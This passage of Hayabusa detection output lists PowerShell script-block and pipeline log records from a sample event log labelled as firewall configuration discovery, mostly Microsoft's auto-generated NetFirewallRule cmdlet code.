[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = 
${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""New-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
